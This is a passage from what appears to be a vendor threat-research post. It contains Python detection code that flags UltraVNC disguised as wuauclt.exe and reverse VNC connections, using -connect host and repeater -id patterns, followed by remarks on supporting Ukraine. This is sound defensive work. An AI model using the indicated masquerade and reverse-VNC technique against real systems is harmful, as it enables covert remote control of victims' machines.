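        "masquerade": name == "wuauclt.exe" and directory != LEGIT_WUAUCLT_DIR,
        "autoreconnect": bool(re.search(r"(?:^|\s)-autoreconnect\b", cmdline, re.I)),
        "repeater_id": None,
        "host": None,
        "port": None,
        "dynamic_dns": False,
    }
    m = re.search(r"-id:(\S+)", cmdline, re.I)
    if m:
        findings["repeater_id"] = m.group(1)
    m = re.search(r"-connect\s+([^\s:]+)(?::+(\d+))?", cmdline, re.I)
    if m:
        findings["host"] = m.group(1).lower()
        findings["port"] = int(m.group(2)) if m.group(2) else DEFAULT_VIEWER_PORT
        findings["dynamic_dns"] = findings["host"].endswith(DYNDNS_SUFFIXES)
    # Host plus repeater id is the signature of the repeater (mode II) setup described above.
    findings["reverse_vnc"] = findings["host"] is not None and findings["repeater_id"] is not None
    return findings


if __name__ == "__main__":
    for key, value in analyze_vnc_launch(SAMPLE_IMAGE, SAMPLE_CMDLINE).items():
        print(f"{key:14} {value}")
```

The masquerade check alone is worth running across endpoint inventory: a binary named after a system component but hashing to UltraVNC's winvnc.exe, or residing under a user profile, is a finding regardless of its command line.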
## A call to action
Trellix has historically had a significant customer base in Ukraine and when the cyberattacks targeting the country intensified, we coordinated closely with government and industry partners to provide greater visibility into the evolving threat landscape. We have been eager to support the region against malicious cyber activity and have been able to go beyond sharing knowledge to also provide a wide range of security appliances at no cost in the affected region (our special thanks go out to our partners at Mandiant in getting some of the appliances deployed at those organizations who needed protection the most).